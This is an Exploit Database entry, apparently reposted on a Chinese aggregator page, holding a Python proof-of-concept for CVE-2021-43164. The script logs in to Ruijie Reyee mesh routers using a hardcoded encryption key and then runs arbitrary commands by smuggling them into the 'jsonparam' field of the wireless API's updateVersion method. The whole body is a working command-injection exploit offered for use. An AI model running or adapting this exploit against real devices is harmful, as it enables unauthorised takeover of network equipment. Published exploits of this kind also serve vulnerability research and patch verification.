Ruijie Reyee Mesh Router – Remote Code Execution (RCE) (Authenticated)

• Exploit Database
• 17 阅读

• 作者： Minh Khoa
  日期： 2022-05-11
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/50930/

• # Exploit Title: Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated)
  # Google Dork: None
  # Date: November 1, 2021
  # Exploit Author: Minh Khoa of VSEC
  # Vendor Homepage: https://ruijienetworks.com
  # Software Link: https://www.ruijienetworks.com/resources/products/1896-1900
  # Version: ReyeeOS 1.55.1915 - EW_3.0(1)B11P35 and EW_3.0(1)B11P55
  # Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO
  # CVE: CVE-2021-43164
  
  #!/usr/bin/python3
  
  import os
  import sys
  import time
  import requests
  import json
  
  def enc(PASS):
  key = "RjYkhwzx$2018!"
  shell = "echo '{}' | openssl enc -aes-256-cbc -a -k '{}' -md md5 2>/dev/null".format(PASS, key)
  return os.popen(shell).read().strip()
  
  try:
  TARGET= sys.argv[1]
  USER= sys.argv[2]
  PASS= sys.argv[3]
  COMMAND = sys.argv[4]
  except Exception:
  print("CVE-2021-43164 PoC")
  print("Usage: python3 exploit.py <target> <user> <pass> <command>")
  print("Example: python3 exploit.py 192.168.110.1 admin password 'touch /tmp/pwned'")
  sys.exit(1)
  
  endpoint = "http://{}/cgi-bin/luci/api/auth".format(TARGET)
  payload = {
  "method": "login",
  "params": {
  "username": USER,
  "password": enc(PASS),
  "encry": True,
  "time": int(time.time()),
  "limit": False
  }
  }
  
  r = requests.post(endpoint, json=payload)
  sid = json.loads(r.text)["data"]["sid"]
  
  endpoint = "http://{}/cgi-bin/luci/api/wireless?auth={}".format(TARGET, sid)
  payload = {
  "method": "updateVersion",
  "params": {
  "jsonparam": "'; {} #".format(COMMAND)
  }
  }
  
  r = requests.post(endpoint, json=payload)
  print(r.text)